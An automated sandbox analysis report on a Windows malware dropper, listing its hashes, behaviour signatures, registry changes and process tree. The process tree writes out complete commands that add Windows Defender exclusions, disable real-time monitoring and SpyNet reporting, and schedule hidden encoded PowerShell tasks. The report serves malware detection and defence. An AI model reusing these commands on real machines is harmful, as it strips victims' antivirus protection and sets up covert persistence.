Analysis
-
max time kernel
154s -
max time network
164s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
20/10/2022, 12:37
Static task
static1
Behavioral task
behavioral1
Sample
aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe
Resource
win7-20220812-en
General
-
Target
aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe
-
Size
7.3MB
-
MD5
ff57d53e6d0eea8498d08effa5b54133
-
SHA1
8223400b775e64c1899da40c58d70db0daf5420a
-
SHA256
aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2
-
SHA512
88ad7d73dc0f9a171f690b471f4220866ddaea2449b6560ec45070b57b8ff76d5ba7740405ef16a100e3463d615d7885b3b7a83dd9c192d11fc8d226d082023e
-
SSDEEP
196608:91OrVzZghwbM+heDQ6n7nar7K0yDZ7rdq63+oN/bTf:3OrVS1OynanKdz3xN/bTf
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yUSqPVaaVaTonAKz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yUSqPVaaVaTonAKz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yUSqPVaaVaTonAKz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CGnJgFCBAzUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CGnJgFCBAzUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PFmWviqWHYwU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mClEBLvlRMFiC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WUQzEHOimFfJbvVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\WUQzEHOimFfJbvVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\mClEBLvlRMFiC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PFmWviqWHYwU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DGkdqERBU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DGkdqERBU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VyejTHXZDswSKCkodlR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VyejTHXZDswSKCkodlR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yUSqPVaaVaTonAKz = "0" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Executes dropped EXE 4 IoCs
pid Process 1092 Install.exe 1440 Install.exe 1560 rPeErUS.exe 856 beOFBXy.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
pid Process 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 1092 Install.exe 1092 Install.exe 1092 Install.exe 1092 Install.exe 1440 Install.exe 1440 Install.exe 1440 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 9 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rPeErUS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rPeErUS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat beOFBXy.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rPeErUS.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak beOFBXy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja beOFBXy.exe File created C:\Program Files (x86)\DGkdqERBU\CwhtFu.dll beOFBXy.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi beOFBXy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi beOFBXy.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bWfTenrnZRhiBbesVI.job schtasks.exe File created C:\Windows\Tasks\jCymsroQFbYeGMouD.job schtasks.exe File created C:\Windows\Tasks\PPsmXAxsGZAbEXH.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1528 schtasks.exe 840 schtasks.exe 1744 schtasks.exe 892 schtasks.exe 1096 schtasks.exe 392 schtasks.exe 288 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 29 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2C60A9E4-ABDB-4D9B-A588-EA8943CBA7F3}\WpadNetworkName = "Network 3" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings beOFBXy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 beOFBXy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2C60A9E4-ABDB-4D9B-A588-EA8943CBA7F3}\WpadDecisionTime = a063cee191e4d801 beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ce-98-33-14-f9-67\WpadDecisionReason = "1" beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2C60A9E4-ABDB-4D9B-A588-EA8943CBA7F3} beOFBXy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2C60A9E4-ABDB-4D9B-A588-EA8943CBA7F3}\ce-98-33-14-f9-67 beOFBXy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f007d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2C60A9E4-ABDB-4D9B-A588-EA8943CBA7F3}\WpadDecisionReason = "1" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ce-98-33-14-f9-67 beOFBXy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ce-98-33-14-f9-67\WpadDecisionTime = a063cee191e4d801 beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ce-98-33-14-f9-67\WpadDecision = "0" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 beOFBXy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2C60A9E4-ABDB-4D9B-A588-EA8943CBA7F3}\WpadDecision = "0" beOFBXy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 392 powershell.EXE 392 powershell.EXE 392 powershell.EXE 1608 powershell.EXE 1608 powershell.EXE 1608 powershell.EXE 568 powershell.EXE 568 powershell.EXE 568 powershell.EXE 1432 powershell.EXE 1432 powershell.EXE 1432 powershell.EXE 856 beOFBXy.exe 856 beOFBXy.exe 856 beOFBXy.exe 856 beOFBXy.exe 856 beOFBXy.exe 856 beOFBXy.exe 856 beOFBXy.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 392 powershell.EXE Token: SeDebugPrivilege 1608 powershell.EXE Token: SeDebugPrivilege 568 powershell.EXE Token: SeDebugPrivilege 1432 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1644 wrote to memory of 1092 1644 aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe 27 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1092 wrote to memory of 1440 1092 Install.exe 28 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1488 1440 Install.exe 30 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1440 wrote to memory of 1784 1440 Install.exe 32 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1488 wrote to memory of 1048 1488 forfiles.exe 35 PID 1784 wrote to memory of 1508 1784 forfiles.exe 34 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1048 wrote to memory of 1628 1048 cmd.exe 36 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1508 wrote to memory of 1432 1508 cmd.exe 37 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1048 wrote to memory of 2036 1048 cmd.exe 38 PID 1508 wrote to memory of 1572 1508 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe"C:\Users\Admin\AppData\Local\Temp\aeb63c6af18449d48adf8892630d8bb66c46e39c5c0377c85befce4dd5484df2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS4A5A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Users\Admin\AppData\Local\Temp\7zS6356.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1048 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1628
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2036
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1432
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1572
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfBaYUiPy" /SC once /ST 07:11:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfBaYUiPy"4⤵PID:1056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfBaYUiPy"4⤵PID:1984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWfTenrnZRhiBbesVI" /SC once /ST 14:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\rPeErUS.exe\" 1d /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:840
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B9137DF5-D381-4AE4-91B0-6A154C9B5567} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1660
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:944
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1584
-
C:\Windows\system32\taskeng.exetaskeng.exe {7C8A2314-F44A-4D62-91AC-A6E584FB6780} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\rPeErUS.exeC:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\VKXYZpUBOsBjTnk\rPeErUS.exe 1d /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1560 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVcBVYFna" /SC once /ST 02:31:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVcBVYFna"3⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVcBVYFna"3⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1556
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:520
-
